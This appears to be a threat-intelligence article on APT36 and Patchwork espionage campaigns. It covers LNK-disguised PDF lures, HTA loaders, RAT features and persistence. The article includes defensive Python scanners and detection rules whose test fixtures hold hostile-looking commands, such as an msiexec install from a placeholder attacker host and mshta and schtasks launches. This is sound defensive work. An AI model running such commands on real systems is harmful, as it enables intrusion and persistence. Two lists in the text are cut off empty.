
APT36 Transparent Tribe Uses Sophisticated RAT Malware in New Espionage Campaigns


Transparent Tribe Expands Espionage Campaigns Using Advanced RAT Techniques

A long-running cyber espionage group known as Transparent Tribe has been linked to a new wave of targeted attacks aimed at Indian government bodies, academic institutions, and other strategically sensitive organizations. The campaign relies on a remote access trojan (RAT) that allows attackers to maintain long-term, covert control over infected systems.

Recent technical analysis shows that the attackers are using deceptive delivery methods to bypass user suspicion. One of the key techniques involves a malicious Windows shortcut (LNK) file disguised as a harmless PDF document. The file even contains real PDF content, making it appear legitimate when opened.

Transparent Tribe, also tracked as APT36, has a history of cyber espionage activity focused primarily on Indian targets. The group has been active for over a decade and is widely believed to operate with state backing. Over the years, it has continuously refined its malware toolkit to stay ahead of detection.


An Evolving Malware Arsenal

The group is known for rotating and upgrading its remote access tools. Previous campaigns have used malware families such as CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. The latest attacks continue this trend, demonstrating a high level of adaptability and technical maturity.

The infection chain begins with a spear-phishing email that delivers a ZIP archive. Inside the archive is a shortcut file made to look like a PDF. When the victim opens it, the file silently launches a hidden HTML Application (HTA) using the legitimate Windows utility mshta.exe.

This HTA script decrypts and loads the final RAT payload directly into memory, reducing its footprint on disk and making detection harder. At the same time, it opens a decoy PDF for the user, reinforcing the illusion that nothing unusual has occurred.

To ensure the malware runs smoothly across different environments, the script interacts with Windows components using ActiveX objects. This allows it to profile the system, adapt its behavior, and increase execution reliability.
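The delivery step above (a ZIP carrying a shortcut named like a PDF, whose target is mshta.exe, with real PDF bytes padded onto the file) can be triaged statically before anyone double-clicks it. The following is an added example, not code from the original article or from any of the researchers it cites: a small Python scanner that walks a ZIP archive, parses each shell link's StringData fields (target path, arguments, icon) according to the MS-SHLLINK layout, and flags the three traits described in the text. The archive and shortcut bytes it scans are constructed inside the script as a test fixture; file names, paths and the `PLACEHOLDER.hta` argument are assumptions, not indicators from the campaign.

```python
import io
import ntpath
import struct
import zipfile

# Shell Link (LNK) constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
# Windows script hosts and installers that a document-looking shortcut has no reason to target.
SCRIPT_HOSTS = {"mshta", "cmd", "powershell", "wscript", "cscript", "msiexec", "rundll32"}

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link (name, target path, arguments, icon)."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                  # fixed-size ShellLinkHeader
    if flags & HAS_IDLIST:                      # IDListSize (2 bytes) + item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                    # LinkInfoSize covers the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:             # StringData entries appear in this fixed order
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + count * 2].decode("utf-16-le", "replace")
            pos += count * 2
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields

def assess_lnk(filename: str, data: bytes) -> list:
    """Heuristic findings for one shortcut: lure naming, script-host target, HTA argument, embedded PDF."""
    findings = []
    lower = filename.lower()
    if lower.endswith(".lnk") and lower[:-4].endswith(DOC_EXTS):
        findings.append("double extension: shortcut named like a document")
    fields = parse_lnk(data)
    target = ntpath.basename(fields.get("relative_path", "")).lower()
    if target.endswith(".exe"):
        target = target[:-4]
    if target in SCRIPT_HOSTS:
        findings.append(f"target is script host {target}.exe")
    if ".hta" in fields.get("arguments", "").lower():
        findings.append("arguments reference an HTA file")
    if b"%PDF-" in data:                        # a genuine shell link never carries a PDF header
        findings.append("PDF content embedded in shortcut file")
    return findings

def scan_zip(zip_bytes: bytes) -> dict:
    """Map every .lnk member of an archive to its findings (empty list = nothing flagged)."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                report[info.filename] = assess_lnk(info.filename, zf.read(info))
    return report

def build_sample_lnk(relative_path: str, arguments: str, icon: str, trailer: bytes = b"") -> bytes:
    """Constructed minimal shell link used only as a test fixture (not a real sample)."""
    flags = HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + b"\x00" * (0x4C - 24)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon))
    return header + body + b"\x00" * 4 + trailer   # four zero bytes = empty ExtraData block

def build_sample_zip() -> bytes:
    """Constructed archive: one lure-style shortcut, one ordinary shortcut, one text file."""
    lure = build_sample_lnk(r"..\..\Windows\System32\mshta.exe", r"C:\Users\Public\PLACEHOLDER.hta",
                            r"%ProgramFiles%\Adobe\Acrobat.exe",
                            trailer=b"%PDF-1.4\n% constructed decoy content\n")
    benign = build_sample_lnk(r"..\..\Windows\System32\notepad.exe", "",
                              r"%SystemRoot%\System32\notepad.exe")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Advisory.pdf.lnk", lure)
        zf.writestr("Notes.lnk", benign)
        zf.writestr("readme.txt", "constructed fixture")
    return buf.getvalue()

if __name__ == "__main__":
    for name, findings in scan_zip(build_sample_zip()).items():
        print(name, "->", findings or "clean")
```

The parser deliberately stops after StringData; real lures often carry a LinkTargetIDList and ExtraData blocks, which this skips by size rather than interpreting, so the target and argument strings are still recovered. Mail gateways that already block `.lnk` inside archives make the first check redundant, but the script-host and embedded-PDF checks remain useful on files that reach an analyst.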


Smart Persistence Based on Antivirus Detection

One of the more notable features of this campaign is how it adjusts persistence techniques based on the security software found on the victim’s machine.

This flexible approach helps the threat remain active even in environments with endpoint protection.


Full-Featured RAT Capabilities

A secondary HTA file drops a DLL named iinneldc.dll, which functions as a complete remote access trojan. Once active, it allows attackers to remotely control the system, manage files, steal data, capture screenshots, manipulate the clipboard, and manage running processes.

Security researchers note that Transparent Tribe remains highly focused and persistent, with a clear intelligence-gathering objective centered on Indian government, education, and other high-value sectors.


A Parallel Campaign Using Government-Themed Lures

In a related operation observed recently, the same group has been linked to another shortcut-based attack that impersonates an official government advisory PDF. The file name closely resembles a legitimate document, increasing the likelihood of user interaction.

When opened, the shortcut executes a hidden command through cmd.exe, which downloads an MSI installer from a remote domain. This installer performs several actions, including:

Interestingly, the decoy document used in this campaign is a genuine advisory issued in 2024 by Pakistan’s national cyber emergency authority, warning about malware delivered through fake WhatsApp messages. The attackers reused the real document to increase credibility.


Command-and-Control and Long-Term Access

One of the deployed DLLs connects to a hard-coded command-and-control server registered earlier in 2025. Although the server is currently inactive, the malware’s registry-based persistence ensures the threat can be reactivated if the infrastructure comes back online.

The malware communicates using multiple HTTP-based endpoints designed to register infected systems, send heartbeat signals, receive commands, and adjust behavior in virtualized environments. To evade detection, endpoint strings are stored in reverse order and reconstructed at runtime.
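Storing endpoint strings backwards defeats a plain `strings`-and-grep pass, but the trick is cheap to undo during static triage. The block below is an added example, not code from the article or from the researchers it summarizes: it pulls printable runs out of a byte blob, reverses each one, and reports the runs that look like a URL path or hostname only after reversal. The blob it scans is constructed inline as a stand-in for a binary's read-only data; the endpoint names and the `c2.example.invalid` host are made up for the fixture, not indicators from the campaign.

```python
import re

MIN_LEN = 6
# Printable ASCII runs of at least MIN_LEN bytes, as a strings(1)-style extractor would find them.
_PRINTABLE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# What an HTTP endpoint looks like once the reversal is undone: an absolute path
# (optionally preceded by a scheme and host) or a bare dotted hostname.
_ENDPOINT = re.compile(r"^(?:https?://[\w.-]+)?/[\w./?=&%-]*$|^[\w-]+(?:\.[\w-]+)+$")

def extract_strings(blob: bytes):
    """Yield (offset, text) for every printable ASCII run in the blob."""
    for m in _PRINTABLE.finditer(blob):
        yield m.start(), m.group().decode("ascii")

def find_reversed_endpoints(blob: bytes) -> list:
    """Return (offset, stored, reconstructed) for strings that match the endpoint
    pattern only when reversed. Strings already readable forwards (DLL names,
    legitimate URLs) are ignored so the output is limited to deobfuscated candidates."""
    hits = []
    for off, s in extract_strings(blob):
        rev = s[::-1]
        if _ENDPOINT.match(rev) and not _ENDPOINT.match(s):
            hits.append((off, s, rev))
    return hits

def build_sample_blob() -> bytes:
    """Constructed stand-in for a binary's .rdata section (not a real sample):
    a few reversed endpoint strings mixed with ordinary forward strings."""
    stored = [b"/register.php"[::-1], b"/api/heartbeat"[::-1], b"/cmd?id="[::-1],
              b"http://c2.example.invalid/vm_check"[::-1]]
    filler = b"\x00\x01\x02MZ\x90\x00This program cannot be run in DOS mode.\x00"
    return filler + b"\x00".join(stored) + b"\x00kernel32.dll\x00GetTickCount\x00"

if __name__ == "__main__":
    for off, stored, rebuilt in find_reversed_endpoints(build_sample_blob()):
        print(f"0x{off:06x}  {stored!r:40} -> {rebuilt}")
```

The same heuristic extends to other trivial string transforms (ROT13, single-byte XOR) by swapping the `rev = s[::-1]` line for the candidate transform; the filter that matters is "readable only after transformation". Note that a sample which builds its strings from UTF-16 or from split fragments will not be caught by an ASCII-run scan, which is why runtime string capture from a sandbox remains the complementary check.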

The malware also surveys installed antivirus software, further enhancing its reconnaissance and evasion capabilities.


Patchwork and the Emergence of StreamSpy

Around the same time, another threat group known as Patchwork—also referred to as Dropping Elephant or Maha Grass—has been connected to attacks targeting Pakistan’s defense sector. These attacks involve a Python-based backdoor delivered through phishing emails containing ZIP archives.

Inside the archive is a malicious MSBuild project. When executed using msbuild.exe, it deploys a dropper that installs and launches the Python RAT. The malware can execute remote commands, load Python modules, and transfer files to and from the compromised system.

By late 2025, Patchwork was also linked to a previously undocumented trojan called StreamSpy. This malware uses both WebSocket and HTTP channels for command-and-control communication, making traffic analysis and detection more difficult.


StreamSpy Capabilities and Distribution

StreamSpy is distributed through ZIP files hosted on cloud-based domains. The main executable can collect system information, establish persistence through registry keys, scheduled tasks, or startup shortcuts, and communicate with its operators using multiple protocols.
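The persistence mechanisms listed above (Run keys, scheduled tasks, Startup-folder shortcuts), together with the execution chains described earlier in the article (cmd.exe handing off to an MSI installer fetched from a remote host, and msbuild.exe launching a Python runtime), all leave process, registry and file telemetry that an endpoint sensor records. The following is an added example, not code from the article or from any vendor: a rule set in Python run over a handful of simplified Sysmon-style events that are constructed inline. Event IDs follow Sysmon's numbering (1 process create, 11 file create, 13 registry value set); the paths, user name, task name and `c2.example.invalid` host in the fixture are assumptions, not indicators from either campaign. The MITRE ATT&CK technique IDs in the rule names are the standard ones for those behaviours.

```python
import re

# Constructed, simplified Sysmon-style events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe",
     "cmd": "explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r"mshta.exe C:\Users\Public\PLACEHOLDER.hta"},
    {"id": 1, "image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "msiexec /i http://c2.example.invalid/PLACEHOLDER.msi /qn"},
    {"id": 1, "image": r"C:\Users\u\AppData\Local\Programs\Python\python.exe",
     "parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe", "cmd": "python.exe stage.py"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Users\u\AppData\Roaming\svc.exe",
     "cmd": r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\Users\u\AppData\Roaming\svc.exe"},
    {"id": 13, "image": r"C:\Users\u\AppData\Roaming\svc.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\u\AppData\Roaming\svc.exe"},
    {"id": 11, "image": r"C:\Users\u\AppData\Roaming\svc.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.lnk"},
    {"id": 13, "image": r"C:\Program Files\Vendor\setup.exe",               # legitimate installer, not flagged
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "details": r"C:\Program Files\Vendor\agent.exe"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": "notepad.exe"},
]

# Locations an ordinary user can write to; persistence pointing here is far more suspicious
# than persistence pointing into Program Files or System32.
USER_WRITABLE = re.compile(r"\\(appdata|programdata|users\\public|temp)\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)

def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev: dict) -> list:
    """Return the rule names an event trips (empty list = nothing matched)."""
    tags = []
    if ev["id"] == 1:
        img, par, cmd = _base(ev["image"]), _base(ev["parent"]), ev["cmd"].lower()
        # Shortcut double-clicked in Explorer launches the HTA host (execution chain from the text).
        if img == "mshta.exe" and par == "explorer.exe" and ".hta" in cmd:
            tags.append("T1218.005 mshta launched from explorer with HTA argument")
        if img == "msiexec.exe" and par == "cmd.exe" and re.search(r"https?://", cmd):
            tags.append("T1218.007 msiexec installing package from remote URL via cmd.exe")
        if par == "msbuild.exe" and img.startswith("python"):
            tags.append("T1127.001 msbuild spawning a Python interpreter")
        if img == "schtasks.exe" and "/create" in cmd and USER_WRITABLE.search(cmd):
            tags.append("T1053.005 scheduled task created for a user-writable path")
    elif ev["id"] == 13 and RUN_KEY.search(ev["target"]) and USER_WRITABLE.search(ev.get("details", "")):
        tags.append("T1547.001 Run key value pointing to a user-writable path")
    elif ev["id"] == 11 and STARTUP_DIR.search(ev["target"]) and ev["target"].lower().endswith(".lnk"):
        tags.append("T1547.001 shortcut dropped into the Startup folder")
    return tags

def triage(events: list) -> list:
    """Return (event index, matched rule names) for every event that trips at least one rule."""
    return [(i, tags) for i, ev in enumerate(events) if (tags := check_event(ev))]

if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(tags)}")
```

The user-writable-path filter is what keeps the Run-key and scheduled-task rules from firing on every vendor installer; in a real deployment it would be paired with an allow-list of signed images. A single persistence hit is low-confidence on its own, so the value of running all rules over the same window is the overlap: one image appearing in a Run key, a task and a Startup shortcut, as `svc.exe` does in the fixture, is what a responder would pull for analysis first.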

The malware supports a wide range of commands, including file downloads, uploads, deletion, renaming, disk enumeration, and execution of both cmd and PowerShell instructions.

Researchers have noted similarities between StreamSpy and earlier malware families linked to other regional threat actors, suggesting shared tooling or collaboration between groups.


Final Thoughts

These campaigns highlight how advanced threat actors continue to refine social engineering, malware delivery, and persistence techniques. By blending legitimate tools, real documents, and adaptive behavior, groups like Transparent Tribe and Patchwork remain difficult to detect and disrupt.

For organizations in high-risk sectors, the activity underscores the importance of strong email security, user awareness, endpoint visibility, and continuous monitoring for suspicious behavior rather than reliance on signature-based detection alone.
